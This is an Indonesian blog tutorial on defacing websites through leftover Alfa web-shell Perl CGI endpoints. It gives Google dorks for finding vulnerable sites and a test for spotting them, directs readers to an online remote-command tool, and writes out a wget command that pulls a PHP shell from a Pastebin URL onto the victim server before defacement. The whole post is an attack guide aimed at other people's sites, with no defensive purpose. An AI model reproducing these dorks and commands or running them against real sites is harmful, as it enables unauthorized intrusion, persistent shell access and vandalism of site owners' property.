Deface Poc Alfa Perl (RCE) Upload Shell
Hy semua, balik lagi dengan nzul jadi disini aku akan ngasih tutorial cara deface Poc dengan metode RCE perl.alfa.
Jadi ini tuh bekasan upload Shell Alfa yang hilang jadi kita bisa remote nya dengan tools perl Alfa RCE.
Oke langsung lanjut ke tutorial nya
Bahan-bahan yang harus kamu siapkan
• Dork?
inurl://ALFA_DATA/alfacgiapi/
intext://perl.alfa
index of /alfacgiapi/per.alfa
Index of /ALFA_DATA/alfacgiapi/perl.alfa
( Racik dork nya atau kalian bisa kembangin sendiri )
• Tools ( Perl Alfa Rce )
• Command upload Shell
wget https://pastebin.com/raw/ept8KywF -O nzul.php
Pertama kalian dorking dulu webnya dengan dork diatas atau dork racikan kalian sendiri.
Ketika sudah Nemu webnya kalian klik per.alfa
Kalo blank berarti webnya vuln Alfa perl RCE.
Selanjutnya kali masuk ke tools nya
Exploits.my.id, dan salin URL tadi
contoh:
http://site.com/ALFA_DATA/alfacgiapi/perl.alfa
Kemudian cek dengan command ls -la
Kemudian masukkan command upload shellnya
wget https://pastebin.com/raw/ept8KywF -O nzul.php
Lalu klik " Gaskan "
Jika tools nya kayak gini? Berarti Shell kalian telah terUpload ke web tersebut.
Kalo kalian ingin ngecek Shell nya ke upload atau enggak kali bisa masukkan command
ls
Dan akan terlihat Shell kita telah terUpload.
Boom, terUpload kalian tinggal deface deh
Akses?
http://site.com/ALFA_DATA/alfacgiapi/shellmu.php
Mungkin segitu aja tutor dari nzul,
Kalo ada gak paham boleh tanya di kolom komentar
See u next time.
Posting Komentar untuk "Deface Poc Alfa Perl (RCE) Upload Shell"